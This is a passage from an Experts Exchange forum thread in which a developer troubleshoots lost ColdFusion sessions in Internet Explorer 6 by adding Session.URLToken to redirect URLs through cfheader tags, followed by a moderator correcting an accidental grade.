>
<cfheader
statuscode="302"
statustext="Object Temporarily Moved"
>
<cfheader
name="location"
value="http://#CGI.SERVER_NAME##CentralStationRedirect#?#Session.URLToken#&#CreateUUID()#"
>
add that inside a cfif right?
CJ
CJ
ASKER
Right. A complex set of cfcases and cfifs. It doesn't seem to help, though. At least the forms without Session.URLToken in the URL still don't work.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
I'm changing all <cflocation to <cf_location and all AddToken="No" to AddToken="Yes" and checking location.href on a case by case basis. I also probably need to go through each of the 580 or so forms in the app and add Session.URLToken to the URL. <cf_location was written by Christopher Bradford and just puts those two <cfheaders in place.
ah ok.. keep us posted.
CJ
CJ
ASKER
Others have confirmed that IE 6.1 sp1 is not respecting the area of memory that Macromedia uses to store its cookie data. Adding the session info to the URL, etc. helps a little.
A C? I would have rather you asked to PAQ this question than award it to me with a C. :-(
CJ
CJ
ASKER
OOPS! That was a mistake! How do I fix that?
I can get a moderator to fix that.
What do you want to change it to?
CJ
What do you want to change it to?
CJ
ASKER
A
Grade changed as per requested.
Cerebro
EE Mod
Cerebro
EE Mod
Thanx Cerebro and thank you dbabbit.
CJ
CJ
ASKER